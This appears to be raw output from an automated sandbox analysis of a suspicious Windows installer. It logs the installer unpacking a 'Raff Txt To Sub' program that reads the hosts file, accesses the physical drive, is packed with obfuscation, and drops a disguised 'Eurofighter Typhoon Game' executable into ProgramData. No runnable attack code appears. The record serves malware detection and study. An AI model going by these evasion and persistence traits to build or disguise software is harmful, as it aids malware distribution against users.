        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_0040B34A StartServiceCtrlDispatcherA,2_2_0040B34A
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: 2_2_0040B34A StartServiceCtrlDispatcherA,2_2_0040B34A
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To SubJump to behavior
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeFile created: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmpJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: JtDj8LXROa.exeReversingLabs: Detection: 15%
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeFile read: C:\Users\user\Desktop\JtDj8LXROa.exeJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\JtDj8LXROa.exe "C:\Users\user\Desktop\JtDj8LXROa.exe"
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp "C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp" /SL4 $10482 "C:\Users\user\Desktop\JtDj8LXROa.exe" 3710467 52224
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpProcess created: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe "C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe" -i
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeProcess created: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp "C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmp" /SL4 $10482 "C:\Users\user\Desktop\JtDj8LXROa.exe" 3710467 52224 Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpProcess created: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe "C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exe" -iJump to behavior
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: apphelp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: mpr.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: uxtheme.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: textinputframework.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: coreuicomponents.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: coremessaging.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: wintypes.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: shfolder.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: msacm32.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: textshaping.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: propsys.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: riched20.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: usp10.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: msls31.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: sfc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpSection loaded: sfc_os.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: version.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: dsound.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: powrprof.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: winmmbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: umpdc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: dhcpcsvc.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpWindow found: window name: TMainFormJump to behavior
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: JtDj8LXROa.exeStatic file information: File size 3981762 > 1048576

        Data Obfuscation

        barindex
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeUnpacked PE file: 2.2.txttosub32_64.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeUnpacked PE file: 2.2.txttosub32_64.exe.400000.0.unpack
        Source: is-J2GOF.tmp.1.drStatic PE information: 0x8C00008C [Mon Jun 6 07:19:40 2044 UTC]
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00447880 LoadLibraryA,GetProcAddress,1_2_00447880
        Source: is-E99MS.tmp.1.drStatic PE information: section name: /4
        Source: is-QL93H.tmp.1.drStatic PE information: section name: /4
        Source: is-45KG3.tmp.1.drStatic PE information: section name: /4
        Source: is-TITH4.tmp.1.drStatic PE information: section name: /4
        Source: is-4931H.tmp.1.drStatic PE information: section name: /4
        Source: is-3E0BT.tmp.1.drStatic PE information: section name: /4
        Source: is-HL3OV.tmp.1.drStatic PE information: section name: /4
        Source: is-J2GOF.tmp.1.drStatic PE information: section name: /4
        Source: is-RT5D9.tmp.1.drStatic PE information: section name: /4
        Source: is-FNN9L.tmp.1.drStatic PE information: section name: /4
        Source: is-R0B0H.tmp.1.drStatic PE information: section name: /4
        Source: is-JLHGP.tmp.1.drStatic PE information: section name: /4
        Source: is-F583D.tmp.1.drStatic PE information: section name: /4
        Source: is-4PF6P.tmp.1.drStatic PE information: section name: /4
        Source: is-S3DSP.tmp.1.drStatic PE information: section name: /4
        Source: is-UDOMJ.tmp.1.drStatic PE information: section name: /4
        Source: is-OINQS.tmp.1.drStatic PE information: section name: /4
        Source: is-4D90I.tmp.1.drStatic PE information: section name: /4
        Source: is-MIIEA.tmp.1.drStatic PE information: section name: /4
        Source: is-T9B97.tmp.1.drStatic PE information: section name: /4
        Source: is-U6VV1.tmp.1.drStatic PE information: section name: /4
        Source: is-RD9OC.tmp.1.drStatic PE information: section name: /4
        Source: is-QREK9.tmp.1.drStatic PE information: section name: /4
        Source: is-0GII4.tmp.1.drStatic PE information: section name: /4
        Source: is-8S82H.tmp.1.drStatic PE information: section name: /4
        Source: is-044SQ.tmp.1.drStatic PE information: section name: /4
        Source: is-KVJ9F.tmp.1.drStatic PE information: section name: /4
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: 0_2_00406510 push 0040654Dh; ret 0_2_00406545
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: 0_2_004040B5 push eax; ret 0_2_004040F1
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: 0_2_00404185 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: 0_2_00404206 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: 0_2_004042E8 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: 0_2_00404283 push 00404391h; ret 0_2_00404389
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: 0_2_00408B58 push 00408B8Bh; ret 0_2_00408B83
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeCode function: 0_2_00407EB8 push ecx; mov dword ptr [esp], eax0_2_00407EBD
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_004098D0 push 0040990Dh; ret 1_2_00409905
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0047A114 push ecx; mov dword ptr [esp], ecx1_2_0047A119
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00430248 push ecx; mov dword ptr [esp], eax1_2_0043024D
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_004062B0 push ecx; mov dword ptr [esp], eax1_2_004062B1
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00450364 push 00450397h; ret 1_2_0045038F
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0040A5BC push eax; retn 0040h1_2_0040A5BD
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00410648 push ecx; mov dword ptr [esp], edx1_2_0041064D
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0040A600 push eax; ret 1_2_0040A601
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_004427B4 push ecx; mov dword ptr [esp], ecx1_2_004427B8
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0045A874 push ecx; mov dword ptr [esp], eax1_2_0045A879
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0040A8D2 pushad ; iretd 1_2_0040A8D9
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_004128A0 push 00412903h; ret 1_2_004128FB
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00456934 push 00456978h; ret 1_2_00456970
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00478B88 push 00478C66h; ret 1_2_00478C5E
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0040CFA0 push ecx; mov dword ptr [esp], edx1_2_0040CFA2
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00405485 push eax; ret 1_2_004054C1
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00405555 push 00405761h; ret 1_2_00405759
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_0040F500 push ecx; mov dword ptr [esp], edx1_2_0040F502
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_004055D6 push 00405761h; ret 1_2_00405759
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00405653 push 00405761h; ret 1_2_00405759
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_004056B8 push 00405761h; ret 1_2_00405759
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00419BA0 push ecx; mov dword ptr [esp], ecx1_2_00419BA5
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpCode function: 1_2_00409F8B push ds; ret 1_2_00409FB5
        Source: txttosub32_64.exe.1.drStatic PE information: section name: .text entropy: 6.848714535360274
        Source: Eurofighter Typhoon Game 10.8.45.exe.2.drStatic PE information: section name: .text entropy: 6.848714535360274

        Persistence and Installation Behavior

        barindex
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive02_2_00401A4F
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeCode function: CreateFileA,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive02_2_02D9F7D6
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IEO87.tmp\_isetup\_RegDLL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libgobject-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libglibmm-2.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\Desktop\JtDj8LXROa.exeFile created: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libgcc_s_dw2-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libintl-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libgraphite2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libgmodule-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-3E0BT.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-OINQS.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-T9B97.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IEO87.tmp\_isetup\_setup64.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-S3DSP.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libpangocairo-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libpangowin32-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-8S82H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libtiff-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-QL93H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\liblzma-5.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libjpeg-8.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-JLHGP.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-0GII4.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libharfbuzz-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-4PF6P.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-E99MS.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-TITH4.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libgdk-win32-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libpangomm-1.4-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-RT5D9.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IEO87.tmp\_isetup\_iscrypt.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libpcre-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-MIIEA.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\librsvg-2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\uninstall\unins000.exe (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-45KG3.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libpangoft2-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-U6VV1.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-FNN9L.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-KVJ9F.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-UDOMJ.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libpixman-1-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libpango-1.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-HL3OV.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\zlib1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-F583D.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libsigc-2.0-0.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libwinpthread-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\uninstall\is-APE3N.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libgomp-1.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-RD9OC.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-4D90I.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-R0B0H.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-044SQ.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\libpng16-16.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Temp\is-IEO87.tmp\_isetup\_shfoldr.dllJump to dropped file
        Source: C:\Users\user\AppData\Local\Raff Txt To Sub\txttosub32_64.exeFile created: C:\ProgramData\Eurofighter Typhoon Game 10.8.45\Eurofighter Typhoon Game 10.8.45.exeJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-QREK9.tmpJump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\liblcms2-2.dll (copy)Jump to dropped file
        Source: C:\Users\user\AppData\Local\Temp\is-GCHVL.tmp\is-3J7FL.tmpFile created: C:\Users\user\AppData\Local\Raff Txt To Sub\is-4931H.tmpJump to dropped file
